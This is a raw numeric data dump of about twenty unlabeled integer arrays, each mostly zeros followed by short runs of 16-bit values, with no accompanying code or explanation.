[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 388, 59457, 51174, 1286, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 31488, 5824, 49072, 50540, 63611, 5288],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 26756, 65345, 13542, 33286, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 58368, 55552, 44608, 48528, 53476, 13899],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 53124, 5697, 41446, 65286, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 49408, 55360, 1040, 59780, 56769, 51050],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 13956, 11585, 3814, 31750, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 8704, 6272, 8736, 59784, 48418, 54453],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 40324, 17473, 31718, 63750, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 22272, 60864, 15728, 29404, 2647, 62620],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 1156, 23361, 59622, 30214, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 61184, 13248, 63216, 64079],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 27524, 29249, 21990, 62214, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 48384, 46912, 976, 34676, 6077, 25790],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 53892, 35137, 49894, 28678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 52736, 9088, 36064, 14904, 30158, 14745],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 14724, 41025, 12262, 60678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 29440, 38080, 12080, 40268, 13171, 48208],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 41092, 46913, 40166, 27142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 15360, 44800, 46016, 10992, 21820, 12563],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 1924, 52801, 2534, 59142, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 63744, 58944, 55184, 64100, 32505, 39890],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 28292, 58689, 30438, 25606, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 47616, 48768, 23456, 17384, 46266, 11069],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 54660, 64577, 58342, 57606, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 52992, 3008, 21744, 13500, 28623, 49092],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 15492, 4929, 20710, 24070, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 51200, 12800, 48256, 21280, 38856, 48791],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 3088, 41860, 10817, 48614, 56070, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 21504, 29952, 25920, 16208, 45652, 12149, 8358],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 54288, 2692, 16705, 10982, 22534, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 58880, 59776, 20064, 13976, 50662, 28065],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 39952, 29060, 22593, 38886, 54534, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 11264, 27392, 21184, 28336, 10540, 64363, 4856],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 25616, 55428, 28481, 1254, 20998, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 50432, 51520, 23632, 43668, 18139],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 11280, 16260, 34369, 29158, 52998, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 17408, 12544, 13376, 64272, 8004, 34097, 26426],
